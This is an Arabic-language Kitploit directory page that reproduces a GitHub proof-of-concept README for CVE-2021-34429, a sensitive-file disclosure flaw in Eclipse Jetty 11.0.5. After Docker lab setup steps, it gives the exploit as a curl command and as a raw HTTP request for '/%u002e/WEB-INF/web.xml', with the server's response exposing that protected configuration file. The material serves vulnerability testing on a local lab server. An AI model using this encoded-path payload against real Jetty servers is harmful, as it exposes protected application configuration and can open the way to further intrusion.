Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-34429 — POC لثغرة CVE-2021-34429 - Eclipse Jetty 11.0.5 كشف الملفات الحساسة | Kitploit
أدوات/GitHubGitHub/coldfusionx/cve-2021-34429
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويبسوء التكوين
GitHubcoldfusionx/cve-2021-34429

CVE-2021-34429

POC لثغرة CVE-2021-34429 - Eclipse Jetty 11.0.5 كشف الملفات الحساسة

عرض المستودع
62منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-34429

إثبات المفهوم لـ CVE-2021-34429 - Eclipse Jetty 11.0.5 كشف الملفات الحساسة

استخدام URIs المشفرة للوصول إلى الملفات داخل دليل WEB-INF

إعداد بيئة الاختبار

المتطلبات الأساسية: تثبيت docker و docker-compose على نظامك

لتوزيعات مبنية على دبيان مثل Ubuntu و Kali Linux إلخ، استخدم الأوامر التالية

root@kitploit:~
apt install docker.io
apt install docker-compose

بالنسبة لنظام Windows و mac وغيرها من التوزيعات، يرجى الرجوع إلى الأدلة التالية:

  • https://docs.docker.com/engine/install/
  • https://docs.docker.com/compose/install/

تثبيت Eclipse Jetty 11.0.5

  • استنسخ أو حمّل المستودع
  • شغّل docker-compose up -d
  • يجب أن يكون خادم الويب الخاص بك قيد التشغيل على http://localhost:8080/

home

اختبار الثغرة

قم بتقديم طلب GET إلى http://localhost:8080/%u002e/WEB-INF/web.xml

  • curl -v 'localhost:8080/%u002e/WEB-INF/web.xml'

الطلب

root@kitploit:~
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

الاستجابة

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>

المراجع:

  • https://nvd.nist.gov/vuln/detail/CVE-2021-34429
  • https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
تنزيل الأداة